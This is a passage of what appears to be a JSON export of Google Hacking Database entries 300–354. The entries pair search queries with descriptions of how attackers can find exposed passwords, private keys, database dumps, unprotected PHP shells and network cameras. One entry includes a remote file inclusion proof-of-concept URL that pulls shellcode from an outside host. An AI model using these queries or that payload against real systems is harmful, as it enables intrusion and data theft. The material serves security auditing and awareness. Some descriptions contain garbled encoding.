UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results." }, { "signatureReferenceNumber": "300", "link": "https://www.exploit-db.com/ghdb/300/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Fpublic%2F%3FCmd%3Dcontents&btnG=Search", "shortDescription": "OWA Public Folders (direct view)", "textualDescription": "This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks." }, { "signatureReferenceNumber": "301", "link": "https://www.exploit-db.com/ghdb/301/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&&q=inurl%3A%22shopadmin.asp%22+%22Shop+Administrators+only%22", "shortDescription": "VP-ASP Shop Administrators only", "textualDescription": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html" }, { "signatureReferenceNumber": "302", "link": "https://www.exploit-db.com/ghdb/302/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%3Cfiletype:mny+mny%3E&hl=en&lr=&ie=UTF-8&safe=off&filter=0", "shortDescription": "Microsoft Money Data Files", "textualDescription": "Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called \"Passware\"." }, { "signatureReferenceNumber": "303", "link": "https://www.exploit-db.com/ghdb/303/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=HTTP_USER_AGENT=Googlebot&ie=UTF-8&oe=UTF-8", "shortDescription": "Environment vars", "textualDescription": "This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc." }, { "signatureReferenceNumber": "304", "link": "https://www.exploit-db.com/ghdb/304/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22%23+Dumping+data+for+table+%28username%7Cuser%7Cusers%7Cpassword%29%22+-site%3Amysql.com+-cvs&btnG=Search", "shortDescription": "MySQL tabledata dumps", "textualDescription": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry." }, { "signatureReferenceNumber": "305", "link": "https://www.exploit-db.com/ghdb/305/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Welcome+to+ntop%21%22&btnG=Search", "shortDescription": "Welcome to ntop!", "textualDescription": "Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall." }, { "signatureReferenceNumber": "306", "link": "https://www.exploit-db.com/ghdb/306/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+by%3A+vBulletin+*+3.0.1%22+inurl%3Anewreply.php&btnG=Search", "shortDescription": "vBulletin version 3.0.1 newreply.php XSS", "textualDescription": "vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/." }, { "signatureReferenceNumber": "307", "link": "https://www.exploit-db.com/ghdb/307/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+inurl%3Apsybnc.conf++%22USER.PASS%3D%22&btnG=Search", "shortDescription": "psyBNC config files", "textualDescription": "psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses." }, { "signatureReferenceNumber": "308", "link": "https://www.exploit-db.com/ghdb/308/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22View+and+Configure+PhaserLink%22&btnG=Search", "shortDescription": "intitle:\"View and Configure PhaserLink\"", "textualDescription": "These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)" }, { "signatureReferenceNumber": "309", "link": "https://www.exploit-db.com/ghdb/309/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intext%3A%22Warning%3A+Failed+opening%22+%22on+line%22+%22include_path%22", "shortDescription": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "textualDescription": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths." }, { "signatureReferenceNumber": "310", "link": "https://www.exploit-db.com/ghdb/310/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aphp+inurl%3A%22webeditor.php%22", "shortDescription": "filetype:php inurl:\"webeditor.php\"", "textualDescription": "This is a standard login portal for the webadmin program." }, { "signatureReferenceNumber": "311", "link": "https://www.exploit-db.com/ghdb/311/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3A%22ViewerFrame%3FMode%3D%22&btnG=Google+Search", "shortDescription": "Panasonic Network Cameras", "textualDescription": "Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at \"http://[target-ip]/config.html\" on the target device. Admin logins have no defaults, but created during setup." }, { "signatureReferenceNumber": "312", "link": "https://www.exploit-db.com/ghdb/312/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Asnc-rz30+inurl%3Ahome%2F+&btnG=Search", "shortDescription": "sony SNC-RZ30 Network Cameras", "textualDescription": "sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html." }, { "signatureReferenceNumber": "313", "link": "https://www.exploit-db.com/ghdb/313/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Aflexwatch+intext%3A%22Home+page+ver%22&btnG=Search", "shortDescription": "seyeon FlexWATCH cameras", "textualDescription": "seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.The admin pages are at http://[sitename]/admin/aindex.htm." }, { "signatureReferenceNumber": "314", "link": "https://www.exploit-db.com/ghdb/314/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3Asnc-z20+inurl%3Ahome%2F+&btnG=Google+Search", "shortDescription": "sony SNC-RZ20 network cameras", "textualDescription": "sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper." }, { "signatureReferenceNumber": "315", "link": "https://www.exploit-db.com/ghdb/315/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%28intext%3A%22MOBOTIX+M1%22+%7C+intext%3A%22MOBOTIX+M10%22%29+intext%3A%22Open+Menu%22+Shift-Reload&btnG=Search", "shortDescription": "Mobotix netcams", "textualDescription": "Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.Moderator note: this search was found by L0om and cleaned up by Wolveso." }, { "signatureReferenceNumber": "316", "link": "https://www.exploit-db.com/ghdb/316/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22WJ-NT104+Main+Page%22&btnG=Search", "shortDescription": "Panasonic WJ-NT104 netcams", "textualDescription": "The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp" }, { "signatureReferenceNumber": "317", "link": "https://www.exploit-db.com/ghdb/317/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=e-mail+address+filetype%3Acsv+csv", "shortDescription": "exported email addresses", "textualDescription": "Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation." }, { "signatureReferenceNumber": "318", "link": "https://www.exploit-db.com/ghdb/318/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=filetype%3Aphp+login+%28intitle%3AphpWebMail%7CWebMail%29&btnG=Search", "shortDescription": "phpWebMail", "textualDescription": "PhpWebMail is a php webmail system that supports imap or pop3. It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html." }, { "signatureReferenceNumber": "319", "link": "https://www.exploit-db.com/ghdb/319/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22Powered+by+Invision+Power+Board%28U%29+v1.3+Final%22&btnG=Search", "shortDescription": "Invision Power Board SSI.PHP SQL Injection", "textualDescription": "Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/" }, { "signatureReferenceNumber": "320", "link": "https://www.exploit-db.com/ghdb/320/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=ACID+%22by+Roman+Danyliw%22+filetype%3Aphp&btnG=Search", "shortDescription": "Analysis Console for Incident Databases", "textualDescription": "ACID stands for for \"Analysis Console for Incident Databases\". It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more." }, { "signatureReferenceNumber": "321", "link": "https://www.exploit-db.com/ghdb/321/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22index+of+%2Fphpmyadm", "shortDescription": "Index of phpMyAdmin", "textualDescription": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the \"index of /\" method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin." }, { "signatureReferenceNumber": "322", "link": "https://www.exploit-db.com/ghdb/322/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22%2Fdatabase%2Fcomersus.mdb%22&btnG=Search", "shortDescription": "Comersus.mdb database", "textualDescription": "Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems." }, { "signatureReferenceNumber": "323", "link": "https://www.exploit-db.com/ghdb/323/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+by+PHPFM%22+filetype%3Aphp+-username&btnG=Search", "shortDescription": "Public PHP FileManagers", "textualDescription": "PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those \"public\" versions of PHPFM. An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)" }, { "signatureReferenceNumber": "324", "link": "https://www.exploit-db.com/ghdb/324/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Akey&btnG=Search", "shortDescription": "private key files (.key)", "textualDescription": "This search will find private key files... Private key files are supposed to be, well... private." }, { "signatureReferenceNumber": "325", "link": "https://www.exploit-db.com/ghdb/325/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Aexplorer.cfm+inurl%3A%28dirpath%7CThis_Directory%29&btnG=Search", "shortDescription": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "textualDescription": "Filemanager without authentication." }, { "signatureReferenceNumber": "326", "link": "https://www.exploit-db.com/ghdb/326/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Acsr&btnG=Search", "shortDescription": "private key files (.csr)", "textualDescription": "This search will find private key files... Private key files are supposed to be, well... private." }, { "signatureReferenceNumber": "327", "link": "https://www.exploit-db.com/ghdb/327/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22PHP+Shell+*%22+%22Enable+stderr%22+filetype%3Aphp&btnG=Search", "shortDescription": "PHP Shell (unprotected)", "textualDescription": "PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword \"enable stderr\"." }, { "signatureReferenceNumber": "328", "link": "https://www.exploit-db.com/ghdb/328/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Your+password+is+*+Remember+this+for+later+use%22", "shortDescription": "NickServ registration passwords", "textualDescription": "NickServ allows you to \"register\" a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones)." }, { "signatureReferenceNumber": "329", "link": "https://www.exploit-db.com/ghdb/329/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Page+rev+*%2F*%2F*%22+inurl%3A%22admin&btnG=Search", "shortDescription": "Red Hat Unix Administration", "textualDescription": "Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server." }, { "signatureReferenceNumber": "330", "link": "https://www.exploit-db.com/ghdb/330/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Assl%2Econf+filetype%3Aconf", "shortDescription": "inurl:ssl.conf filetype:conf", "textualDescription": "The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways." }, { "signatureReferenceNumber": "331", "link": "https://www.exploit-db.com/ghdb/331/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&q=PHP+application+warnings+failing+%22include_path%22", "shortDescription": "PHP application warnings failing \"include_path\"", "textualDescription": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006)." }, { "signatureReferenceNumber": "332", "link": "https://www.exploit-db.com/ghdb/332/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Internal+Server+Error%22+%22server+at%22", "shortDescription": "\"Internal Server Error\" \"server at\"", "textualDescription": "We have a similar search already, but it relies on \"500 Internal Server\" which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code." }, { "signatureReferenceNumber": "333", "link": "https://www.exploit-db.com/ghdb/333/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3Alilo.conf+filetype%3Aconf+password+-tatercounter2000+-bootpwd+-man&btnG=Google+Search", "shortDescription": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "textualDescription": "LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives." }, { "signatureReferenceNumber": "334", "link": "https://www.exploit-db.com/ghdb/334/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aphp+inurl%3A%22logging.php%22+%22Discuz%22+error&btnG=Search", "shortDescription": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "textualDescription": "Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements)." }, { "signatureReferenceNumber": "335", "link": "https://www.exploit-db.com/ghdb/335/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Microsoft+Site+Server+Analysis%22&btnG=Google+Search", "shortDescription": "intitle:\"Microsoft Site Server Analysis\"", "textualDescription": "Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. An attacker may use these reports to gather information about the directory structure and possibly identify script files." }, { "signatureReferenceNumber": "336", "link": "https://www.exploit-db.com/ghdb/336/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of%22+passwords+modified&btnG=Search", "shortDescription": "intitle:\"Index of\" passwords modified", "textualDescription": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using \"intitle\" and an extra keyword from the index page (in this case modified)." }, { "signatureReferenceNumber": "337", "link": "https://www.exploit-db.com/ghdb/337/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:index.of.password&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&", "shortDescription": "index.of.password", "textualDescription": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380" }, { "signatureReferenceNumber": "338", "link": "https://www.exploit-db.com/ghdb/338/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22powered+by+webcamXP%22+%22Pro%7CBroadcast%22&btnG=Search", "shortDescription": "\"powered by webcamXP\" \"Pro|Broadcast\"", "textualDescription": "webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online." }, { "signatureReferenceNumber": "339", "link": "https://www.exploit-db.com/ghdb/339/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+sphider%22+-exploit+-ihackstuff+-www.cs.ioc.ee", "shortDescription": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "textualDescription": "dork: \"powered by sphider\" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/" }, { "signatureReferenceNumber": "340", "link": "https://www.exploit-db.com/ghdb/340/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=%22by+Reimar+Hoven.+All+Rights+Reserved.+Disclaimer%22+%7C+inurl%3A%22log%2Flogdb.dta%22+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "textualDescription": "dork: \"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\" this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs" }, { "signatureReferenceNumber": "341", "link": "https://www.exploit-db.com/ghdb/341/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22ORA-12541:+TNS:no+listener%22+intitle:%22error+occurred%22&ie=UTF-8&oe=UTF-8", "shortDescription": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "textualDescription": "In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources." }, { "signatureReferenceNumber": "342", "link": "https://www.exploit-db.com/ghdb/342/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22&btnG=Google+Search", "shortDescription": "intitle:\"Live View / - AXIS\"", "textualDescription": "These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ): \"By default, the username will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201croot\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2 and the password will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2. If these are not the current values, performing a factory default on the unit will reset the password to \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.\"Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x" }, { "signatureReferenceNumber": "343", "link": "https://www.exploit-db.com/ghdb/343/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22sets+mode:+%2Bp%22&ie=UTF-8&oe=UTF-8", "shortDescription": "\"sets mode: +p\"", "textualDescription": "This search reveals private channels on IRC as revealed by IRC chat logs." }, { "signatureReferenceNumber": "344", "link": "https://www.exploit-db.com/ghdb/344/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=%22sets+mode:+%2Bk%22&ie=UTF-8&oe=UTF-8", "shortDescription": "\"sets mode: +k\"", "textualDescription": "This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs." }, { "signatureReferenceNumber": "345", "link": "https://www.exploit-db.com/ghdb/345/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22sets+mode:+%2Bs%22&ie=UTF-8&oe=UTF-8", "shortDescription": "\"sets mode: +s\"", "textualDescription": "This search reveals secret channels on IRC as revealed by IRC chat logs." }, { "signatureReferenceNumber": "346", "link": "https://www.exploit-db.com/ghdb/346/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22BorderManager+Information+alert%22&btnG=Search", "shortDescription": "intitle:\"BorderManager Information alert\"", "textualDescription": "This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query." }, { "signatureReferenceNumber": "347", "link": "https://www.exploit-db.com/ghdb/347/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?&q=%22AnWeb%2f%31%2e%34%32h%22+intitle%3aindex%2eof", "shortDescription": "\"AnWeb/1.42h\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "348", "link": "https://www.exploit-db.com/ghdb/348/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=%22CERN+httpd+3.0B+(VAX+VMS)%22&ie=UTF-8&oe=UTF-8", "shortDescription": "\"CERN httpd 3.0B (VAX VMS)\"", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "349", "link": "https://www.exploit-db.com/ghdb/349/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22JRun+Web+Server%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"JRun Web Server\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "350", "link": "https://www.exploit-db.com/ghdb/350/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22MaXX%2F3.1%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"MaXX/3.1\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "351", "link": "https://www.exploit-db.com/ghdb/351/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F*+server+at%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"Microsoft-IIS/* server at\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "352", "link": "https://www.exploit-db.com/ghdb/352/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F4.0%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"Microsoft-IIS/4.0\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "353", "link": "https://www.exploit-db.com/ghdb/353/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F5.0+server+at%22&btnG=Search", "shortDescription": "\"Microsoft-IIS/5.0 server at\"", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "354", "link": "https://www.exploit-db.com/ghdb/354/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F6.0%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"Microsoft-IIS/6.0\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." 